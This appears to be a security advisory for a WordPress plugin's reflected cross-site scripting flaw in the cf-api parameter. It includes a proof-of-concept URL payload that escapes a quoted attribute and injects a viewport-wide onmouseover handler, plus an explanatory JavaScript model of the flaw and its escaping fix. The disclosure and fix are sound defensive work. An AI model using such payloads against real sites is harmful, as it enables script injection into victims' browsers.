The plugin does not validate and escape the cf-api parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue.
The issue is only exploitable when no forms have been created yet. Proof of concept (the payload is reflected, not stored, so a victim has to open the crafted URL in a browser):

https://example.com/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x

The %22 closes the quoted attribute the value is reflected into; the injected style turns the element into a fixed-position box covering the whole viewport, so the onmouseover handler fires as soon as the pointer moves anywhere over the page.
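Added example, not the plugin's code: it models the reflection described above, shows how the PoC value breaks out of a quoted attribute, and shows the attribute-escaping fix. The reflecting element is assumed to be a text input named cf-api (the page does not say what the plugin emits), and escapeAttr stands in for WordPress's esc_attr().

```javascript
// Added example (not the plugin's code): a query parameter reflected into an
// HTML attribute, the attribute breakout the PoC URL relies on, and the fix.
// Assumption: the plugin reflects the value into a text input named cf-api.

const POC_URL =
  "https://example.com/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x";

// Percent-decode the parameter the way the server sees it: %22 -> ", %20 -> space.
function getCfApi(url) {
  return new URL(url).searchParams.get("cf-api") ?? "";
}

// Hypothetical vulnerable reflection: the raw value is echoed into a quoted attribute.
function reflectVulnerable(value) {
  return `<input type="text" name="cf-api" value="${value}">`;
}

// Attribute escaping in the spirit of WordPress esc_attr(): a double quote
// becomes &quot;, so the value can no longer terminate the attribute.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened reflection: same markup, escaped value.
function reflectHardened(value) {
  return `<input type="text" name="cf-api" value="${escapeAttr(value)}">`;
}

// Tokenize one start tag into its attribute names, following the HTML rule that
// an unquoted attribute value ends at the next whitespace. This is how the
// injected style=... and onmouseover=... become attributes of their own.
function attributeNames(tag) {
  const inner = tag.replace(/^<[a-zA-Z][^\s>]*\s*/, "").replace(/\s*\/?>$/, "");
  const attr = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const names = [];
  let m;
  while ((m = attr.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Event-handler attributes (on*) that a reflected value managed to inject.
function injectedHandlers(tag) {
  return attributeNames(tag).filter((n) => n.startsWith("on"));
}

// Stand-alone run: print both renderings and what the tokenizer finds in each.
const pocValue = getCfApi(POC_URL);
console.log(reflectVulnerable(pocValue));
console.log("vulnerable injects:", injectedHandlers(reflectVulnerable(pocValue)));
console.log(reflectHardened(pocValue));
console.log("hardened injects:", injectedHandlers(reflectHardened(pocValue)));
```

In the vulnerable rendering the tokenizer sees style and onmouseover as separate attributes; in the hardened one the whole payload stays inside value. Escaping fixes the attribute context the value lands in; validating the parameter against the values the plugin actually expects is the additional check worth adding.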
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-28
2022-03-28
2022-04-11